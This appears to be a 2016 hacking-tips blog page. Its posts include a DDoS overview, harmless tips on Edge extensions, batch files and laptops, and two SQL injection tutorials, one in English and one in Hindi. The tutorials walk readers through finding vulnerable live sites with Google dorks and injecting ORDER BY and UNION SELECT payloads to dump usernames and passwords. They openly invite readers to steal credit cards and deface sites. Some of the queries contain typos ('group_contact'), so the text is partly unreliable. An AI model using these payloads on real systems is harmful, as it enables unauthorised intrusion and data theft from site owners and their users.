Saturday, 31 December 2016

#3 : Hacking Tips

Denial of Service

Distributed Denial of Service a.k.a. DDos is a malicious technique. Group of hackers send huge traffic to a webserver to make a website unavailable to legitimate users. DDos can slow down the speed of a website or force it to shut down temporarily. DDoS came into existence in 1998.

==> Why DDoS Attack Are Conducted?

i. Consumption of bandwidth, diskspace or processor time.

ii. Disruption of configuration information, such as routing information.

iii. Disruption of state information, such as unsolicited resetting of TCT Sessions.

iv. Obstructing the communication media between the intended users and the victim so that they can no longer access the site.

Attack Types :

Ping of Death is based on sending the victim a malformed ping of packet, which might lead to a system crash.
SYM Flood occurs when a host sends a flood of TCP/IP packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-opened connection.

Teardrop Attacks involves sending mangled IP graments with overlapping, oversized payloads to target machine. This can crash various OS because of a bug in their TCP/IP.

Peer-to-Peer attack doesn't involve the attacker directly, instead he acts as a master and dictates the client to connect to victim's website.

☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻

Thanks For Visiting....

.m@

My site : iitboss.com

Maverick Milan 03:14 0

#2.1 : Hacking Tips

SQL Injection Tutorial with Example English

SQL injection is one of the most popular method of hacking a web application. This method exploits the security flaws of a website and a hacker can access the database of a site. You can delete, steal or insert data into a database.
You can steal credit card numbers, passwords, de-morph a site etc. I'm going to explain the whole process in detail.

==========================================================

1. Finding a Vulnerable Website

First of all you need to find a vulnerable site, you can use Google dork to do get a list of SQL injection vulnerable sites. A vulnerable site has some sort of flaw in its structure which will be exploited by a hacker, you can search for lists of such site by searching for "List of SQL vulnerable site" in Google. You won't have much difficulty finding a vulnerable website. You can find vulnerable sites by simply typing the given keywords in Google search box.

Examples -
inurl:index.php?id=
inurl:article.php?id=
inurl:page.php?id=

There are other keywords you can use, I've mentioned a few. Any Google dork will display numerous results but not all of them are vulnerable, on the other hand if you searched for list of vulnerable sites, you will see a huge list of such sites. If you have executed the first step then we'll move on to the second.

-------------------------------------------------------------------------------

2. Checking the Vulnerability

Now you've found websites matching the above keywords or you might have found a list of SQL vulnerable websites. Now you'll have to check whether they're vulnerable or not. This step will deteremine whether the site can be hacked or not, it can be done with an apostrophe. Let's assume we have found a site http://www.example.com/index.php?id=2 . Add an apostrophe (') at the end of the URL and hit enter.

Example -
http://www.example.com/index.php?id=2'

If the page loads normally or shows 'page not found', then it is not vulnerable. But if you get an error message, then the site is vulnerable. You should get an error message like this, if the site is vulnerable.

Example -
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\" at line 1."

Congratulations!!! if you've got the message, find a new one if the current URL isn't vulnerable.

-------------------------------------------------------------------------------

3. Finding the Number of Columns

So you've found the vulnerable website, now it's time to check the number of columns. Replace the apostrophe (') with "order by 1" statement, keep the number (1) increasing to 2,3, 4....n until you get an error saying "unknown column".

Example -
http://www.example.com/index.php?id=2 order by 1
No error
http://www.example.com/index.php?id=2 order by 2
No error
http://www.example.com/index.php?id=2 order by 3
No error
http://www.example.com/index.php?id=2 order by 9
Error found "Unknown column".
Let's assume we've got an error on the 9 statement, it means that there are 8 columns in the database.
If the above statements fails, then add "--" at the end of the URL.

Example-
http://www.example.com/index.php?id=2 order by 1--

-------------------------------------------------------------------------------

4. Find Vulnerable Columns

Now we have discovered the number of columns present in the database. We will use "union select" statement to find out the vulnerable columns. Vulnerable columns are the columns that can be hacked. Change the id value to negative (-2). Replace the column sequence to the maximum number of columns.

Example -
http://www.example.com/index.php?id=-2 union select 1, 2, 3, 4, 5, 6, 7, 8--
After executing the above statement you will find the vulnerable columns displayed on your screen.

Example -
3 query was empty 7
The above line shows 3 and 7 are vulnerable and now we can inject our code in it.

-------------------------------------------------------------------------------

5. Find SQL version, Database, Username

Now we'll retrieve the SQL version, database's name and username.

SQL Version

We'll work in column number 3 and replace the vulnerable column with "version()" to fetch the version of the database, it is important to know the version because older version will need different statements to execute to a query.

Example -
http://www.example.com/index.php?id=-2 union select 1, 2, version(), 4, 5, 6, 7, 8--
Press enter and you'll find something like this -
5.0.1 or 4.3.0 (This is SQL version).

Database
We'll now find the database's name.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, database(), 3, 4, 5, 6, 7, 8--
Username This step will be used to retrieve the username.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, user(), 4, 5, 6, 7, 8--

-------------------------------------------------------------------------------

6. Getting the Table Name
Now we'll have to find the table's name, though you can guess a table name like this - admin, members etc. But we'll more effective method.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, group_concat(table_name), 4, 5, 6, 7, 8 from information_schema.tables where table_schema=database()--

-------------------------------------------------------------------------------

7. Get Column Name

You'll need some external help. You've got the table name in the previous step, you will have to convert in char string. You can use a freeware to do it.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, group_contact(column_name), 4, 5, 6, 7, 8 from information_schema.columns where table_name=CHAR(your value)--

-------------------------------------------------------------------------------

8. Display Password & Username

Example -
http://www.example.com/index.php?id=-2 union select 1, 2, group_contact(username,0x2a,password), 4, 5, 6, 7, 8 from database()--

Now you will get displayed the username and password on your screen, congrats!, now you can do anything to the database you can steal, modify or delete the info.

-------------------------------------------------------------------------------

.m@

My Site : iitboss.com

Maverick Milan 03:06 0

#2 : Hacking Tips

SQL इंजेक्शन tutorial example के साथ

Hindi

पिछले एक दशक मेँ हैकिंग का अत्यधिक विकास हुआ है और नई तकनीकों का आविष्कार हुआ है जो काफी आसान भी हैं। एक आम प्रोग्रामर भी इनका इस्तेमाल कर सकता है और एक vulnerable वेबसाइट को हैक कर सकता है। आज मैं इस पोस्ट में कुछ एक तकनीकोँ के बारे मेँ बताता हूँ जिनका इस्तेमाल करके आप Pro की तरह websites को हैक कर सकते हैं। तकनीकोँ का इस्तेमाल आप पासवर्ड चुराने, वेबसाइट को De-morph करने तथा महत्वपूर्ण जानकारी चुराने के लिए कर सकते है। इन तकनीकों को के साथ पूरा सीखने के लिए आप हमारे dedicated hacking tutorials को पढ़ सकते हैं। आपके पास प्रोग्रामिंग का basic knowledge होना चाहिए जैसे PHP, MySQL इत्यािद।

=========================================================

SQL इंजेक्शन

SQL इंजेक्शन बहुत अधिक इस्तेमाल की जाने वाली तकनीक है। इसका उपयोग data-driven applications को हैक करने के लिए किया जाता है। SQL इंजेक्शन attack में input fields या address bar में वेबसाईट URL के अन्त में malicious कोड को डाला जाता है। इसका इस्तेमाल करके आप किसी वेबसाईट के डाटाबेस में प्रवेश करके डाटा को डिलीट, modify या चुरा सकते हैं। इस पोस्ट मे आपको SQL injection की पूरी process को explain किया गया है।

--------------------------------------------------------------------------------

1. Vulnerable वेबसाईट ढूढें

किसी वेबसाईट को हैक करने से पहले आपको एक vulnerable website ढूंढनी होगी। यह काम आप 2 तरीकों से कर सकते हैं।
बहुत से ब्लॉग पर vulnerable sites की लिस्ट होती है।
गूगल डॉर्किंग - इस method में आप गूगल में कुछ एक keywords का सर्च कर सकते हैं उदाहरण -
inurl:index.php?id=
inurl:article.php?id=
inurl:event.php?id=
inurl:buy.php?category=
उपर िदए गए उदाहरणों में से आप किसी एक keyword का उपयोग गूगल के सर्च बॉक्स में कर सकते हैं।

--------------------------------------------------------------------------------------------

2. वेबसाईट की vulnerability check करें

गूगल पर कीवर्ड सर्च करने पर आपकी स्क्रीन पर बहुत से लिंक आएंगे आप उनको बारी - बारी check कर सकते हैं। यह पता करने के लिए कि वेबसाईट vulnerable है या नही। इसके लिए आपको address bar में वेबसाईट के URL आखिर में apostropohe ' डाल कर enter press करें।
उदाहरण
http://www.victimsite.com/index.php?id=1'
यिद साईट vulnerable है तो आपकी screen पर एक error आएगी। और अगर वेबसाईट vulnerable नही है तो आपकी screen पर Page Not Found की error आएगी। अगर आपकी स्क्रीन पर MySQL error आती है तो आपने ढूंढ ली है और अगर आपको page not found की error आई है तो आप किसी और साईट को ढूंढें।

--------------------------------------------------------------------------------------------

3. कुल columns की संख्या ढूंढे

अब आपने vulnerable साईट साईट ढूंढ ली है, आपका अगला कदम डाटाबेस में मौजूद columns की संख्या पता करना है। Columns की संख्या पता करने के लिए के अन्त में ordery by n स्टेटमेंट का उपयोग किया जाता है और parameter की value को minus किया जाता है। हमारे उदाहरण parameter, id में है और value 1 इसकी है।
उदाहरण
http://www.victimsite.com/index.php?id=-1 order by 1
Enter press करने के बाद अगर पेज normally लोड होता है तो आपको statement की value को तब तक बढ़ाते रहना होगा जब तक आपको "Unknown column" की error नहीं आ जाती ।
उदाहरण
http://www.victimsite.com/index.php?id=-1 order by 2
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 3
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 4
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 5
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 6
Error - Unknown column
हमारे example में column 6 पर error आई है इसका मतलब है कि डाटाबेस में column number 6 नहीं है। जबकि column number 5 normally लोड होता है, it means कि database में कुल 5 columns हैं।

--------------------------------------------------------------------------------------------

4. Vulnerable columns को ढूंढें

अब आपको डाटाबेस के total 5 columns में से vulnerable columns को ढूंढना है, जिनकी vulnerability को आप exploit कर सकते हैं। Column vunerability को पता करने के लिए union select स्टेटमेंट का इस्तेमाल किया जाता है।
उदाहरण
http://www.victimsite.com/index.php?id=-1 union select 1,2,3,4,5
Union select के बाद आप सभी columns को comma द्वारा separate करते हुए लिखें। Enter press करने के बाद आपकी screen पर कुछ एक number िदखेंगे, यही vulnerable columns हैं।
उदाहरण
2 4
Example में column 2 और 4 vulnerable हैं, हम column 2 को exploit करेंगे।

--------------------------------------------------------------------------------------------

5. डाटाबेस version पता करें

Vulnerable column choose करने के बाद अब आपको डाटाबेस का वर्जन ढूंढना है। इसके लिए आप choose किए गए vulnerable column को version() से replace करें।
उदाहरण
http://www.victimsite.com/index.php?id=-1 union select 1,version(),3,4,5

--------------------------------------------------------------------------------------------

6. पासवर्ड प्राप्त करें

Database का पासवर्ड हासिल करने के लिए version() को password() से replace करें।
उदाहरण
http://www.victimsite.com/index.php?id=-1 union select 1,password(),3,4,5

--------------------------------------------------------------------------------------------

7. Username प्राप्त करें

यह database के admin का username होता है।
http://www.victimsite.com/index.php?id=-1 union select 1,user(),3,4,5

--------------------------------------------------------------------------------------------

.m@

My Site : iitboss.com

Maverick Milan 02:49 0

The best Edge extensions

Or rather, all the Edge extensions you can try out today.

AdBlock and AdBlock Plus

AdBlock and the similarly-titled AdBlock Plus are two completely separate ad-blocking extensions with extremely similar functionality. Both of these extensions, once installed, will block the majority of ads (you'll still be able to whitelist domains in the extensions' settings) on websites you visit in Edge. Because AdBlock and AdBlock Plus are basically the same extension, running both of them at the same time will not have any benefits and will only bog down the browser.

How to block ads with AdBlock Plus.

Page Analyzer

The Page Analyzer extension is mainly for web developers -- it scans and analyzes open webpages in Edge for performance issues, common errors and opportunities for optimization.

Save to Pocket

Save to Pocket is an extension for users of the popular read-it-later app Pocket. This extension adds a Pocket button to your browser. Hit the button when you're on a webpage you want to read later and it will be automatically saved to Pocket and synced across your other devices for offline reading.

Read out review of Pocket for Android.

Microsoft Translator

The Microsoft Translator extension makes browsing foreign-language websites a bit easier. When you have this extension turned on, you'll see a translation icon in the address bar of foreign-language websites -- just hit the icon and Microsoft will instantly translate the site into your current Windows language. Microsoft Translator supports over 50 languages.

Reddit Enhancement Suite

The Reddit Enhancement Suite extension adds extra functionality to Reddit. Most of these tweaks are small but mighty for Reddit users -- an easy account switcher, better comment navigation, and a never-ending Reddit stream from the homepage.

Mouse Gestures

The Mouse Gestures extension does exactly what it sounds like -- turns on mouse gestures in Edge. To use mouse gestures, click and hold the right mouse button down anywhere inside the browser and then drag your mouse into a gesture. For example, making a gesture that goes to the right and then up will open a new tab, while making a straight-line gesture to the left will take you back a page.

OneNote Web Clipper

The OneNote Web Clipper extension adds a button that you can click to capture all or part of a webpage to save to OneNote. The Web Clipper will either capture the entire page, let you take a screenshot of one part of the page, or capture the page in "Article" format, which grabs just the text on the page. You can save all of these clips to the OneNote notebook of your choice, so it's handy if you're trying to compile a lot of information.

Pin It Button

The Pinterest Pin It Button extension is similar to the OneNote Web Clipper, except for Pinterest. This extension adds a Pin It button to Edge. By default, this button appears next to your other extensions at the top of the ... menu, but you can change its settings so the button appears next to the address bar for easier access. The Pin It button lets you pin anything on the page -- such as photos -- to the Pinterest board of your choice.

LastPass

Popular password manager LastPass is also available as an Edge extension. LastPass stores encrypted passwords and form fill information and can be synced across multiple browsers, so it's particularly convenient for anyone who's thinking of switching over from Chrome or Firefox. You can download the LastPass extension directly from LastPass's website, or from the Windows Store.

Office Online

In Windows Insider Preview Build 14366, Microsoft introduced the Office Online extension, which links up with Microsoft's Office Web Apps to bring an in-browser Office experience to Edge. With the Office Online extension you can open and create new Word, Excel, PowerPoint, OneNote and Swat Online documents without needing Office installed on your device.

Evernote

The Evernote extension is the latest addition to Edge's portfolio of browser extensions. This extension works similarly to the OneNote Web Clipper, but for Evernote. With the Evernote extension, you can clip articles or simplified articles from web pages, or save the full web page or just a bookmark to the Evernote notebook of your choice. This extension comes with its own set of customizable keyboard shortcuts for quick clipping. The Evernote extension currently only works on the latest Preview build (14372), but all of these extensions will be coming to Windows 10 in the Windows 10 Anniversary Update.

.m@

New Site : iitboss.com

Maverick Milan 02:32 0

How To Add Recycle Bin In My Computer

Maverick Milan 02:25 0

Open Multiple Website in Single Click

#1 : Hacking Tips

1) Open Notepad.

2) Copy Below Given Code And Paste It In Notepad.

@echo off
start www.google.in
start www.facebook.com
start www.binaryhackers.com

3) Now save Notepad As Sites.bat

4) Now open your save file and it will open three websites in a single click.

5) You can also add more sites by writing Start followed by websites.

Thursday, 29 December 2016

Maverick Milan 08:06 0

How to Choose Best Laptop for Programming in 2017?

This article will guide you to choose the best laptop for programming in 2017.

As a programmer or developer it becomes really confusing to pick a best laptop from thousands of laptops available in the market. It becomes even more difficult for a person who is just starting programming.

Below I have shared some key points that will definitely help you to pick a perfect laptop for working on any programming technology.

How to Choose Best Laptop for Programming?

RAM

It is the first most important thing that you should look. A laptop with 8GB RAM is an ideal choice but 16GB RAM would the best choice. If your budget is too low then you can go with 4GB RAM also.

Believe me it really sucks working on a low performance machine. Earlier I used to do android app development on a laptop with 4GB RAM. It was so annoying because everything works really slow.

So I would highly recommend you a 16GB RAM laptop if you are a mobile app developer.

Best Choice: 16GB RAM

Ideal Choice: 8GB RAM

Low Budget Choice: 4GB RAM

Processor

Good processor and RAM should be your highest priority while choosing a laptop for programming. As a programmer or developer we have to do multitasking. When I do programming or development I have to open few IDEs along with a browser with several tabs opened. For such purpose a good processor is required.

A laptop with i5 processor is an ideal choice. You can go with i7 processor if you have huge budget and for low budget you can go with i3 processor.

Best Choice: i7 Processor

Ideal Choice: i5 Processor

Low Budget Choice: i3 Processor

Graphic Card

Integrate graphic card is not necessary until you are not doing game development or some high graphics related work. But if you are a game developer then you must go with a laptop with external graphic card.

Best Choice (Specially For Game Developers): External Graphic Card (2GB or 4GB)

Ideal and Low Budget Choice (For Other Developers): Integrated Graphic Card

Storage

SSD and HDD are two storage types that laptops have. SSD gives faster performance but costlier than HDD. Its great if you can afford a SSD storage type laptop. But if you can’t then go with HDD and later on you can use some external SSD storage.

Battery Life

If you mostly work at places where power supply is not available then you must choose a laptop with huge battery life. Otherwise these days almost all laptops come with moderate battery backup.

Below I have shared some laptops that I believe are good for programmers. Even if you don’t like any of them you can consider above points to pick a best laptop according to your usage.